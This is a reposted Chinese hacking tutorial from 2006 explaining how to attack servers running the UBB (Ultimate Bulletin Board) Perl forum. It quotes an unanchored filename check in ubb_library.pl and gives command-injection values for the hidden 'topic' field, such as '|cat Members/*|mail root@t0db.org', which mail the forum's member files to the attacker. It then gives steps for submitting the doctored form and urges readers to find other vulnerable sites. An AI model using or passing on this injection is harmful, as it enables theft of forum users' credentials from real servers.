| 轻松入侵运行UBB的主机 |
|
| 作者:未知 文章来源:网络收集 点击数: 更新时间:2006-3-29 15:18:46
|
UBB即为Ultimate Bullitain Board的简称.是一个网络软件.曾经有一个wwwwboard的漏洞,可以是黑客幸运的获得root权力.但是我们这儿应该是更高级的了.UBB是用perl语言开发的软件,很多站点都使用它,包括progenic.
用Perl编写cgi脚本很简单.而且也很安全,但是他们能接受下面的这些问题吗?
浏览一些站点,我发现一些主页用自己写的脚本,但是更多的是用的网上的软件.还记得pcweek的那次活动吗?他们在Linux机器上装了商业版的photoads,结果被黑客利用了.下面让我们来看看Infopop的UBB.
我从 screen.width-600)this.style.width=screen.width-600;">_blank href=http://www.ultimatebb.com>http://www.ultimatebb.com 下载到了UBB,十分钟后,我找到了下面几行:
ubb_library.pl:901-902
if ($ThreadFile =~ /\d\d\d\d\d\d\.ubb/) {
open (MESSAGE, "$ForumsPath/Forum$number/$ThreadFile");
(注意? 不是 /^\d\d\d\d\d\d\.ubb$/.开发它的程序员是怎么想的?难道是女孩?)
而且,$ThreadFile的值是直接从隐藏的部分 "topic=''"中获得的.
所以,我在表格中填入了:
topic='012345.ubb|mail root@t0db.org
(在不同的主页上,000369.cgi 也是不同的)
找到后,你把 "|cat Members/*|mail root@t0db.org"粘贴到000369.cgi的后面,就像下面这样:
(root@t0db.org 换成你的信箱地址) 保存一下,然后回到你查看源代码的那个页面,在右面你可以看到"want to register"的连接,你把它的连接拷贝下来.
回到源代码中,找到下面这一行:
再把刚才的地址粘贴到postings.cgi的前面,
整理修改一下:
现在把源代码保存为一个html文件到硬盘上,现在打开它,输入你注册的用户名和密码.写上标题等等.然后发送.接着下面就会出现,不能贴此贴的意思....
我们已经成功了,我们现在只要到信箱中等我们的文件就可以了.
现在这个例子已经不能再利用了,你如果想动手试试,那么只要再找一个类似的站点就可以了.
我们对此篇文章不任何责任.:)
|
|
[ 收藏此页到: 天天|和讯|博采|ViVi|狐摘|我摘|天极 ] 文章录入:kinda 责任编辑:kinda |
|
上一篇文章: 与盗QQ,游戏等密码者的对话
下一篇文章: 密码攻防实战:目录加密篇 |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
用户登录 
新用户注册 
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)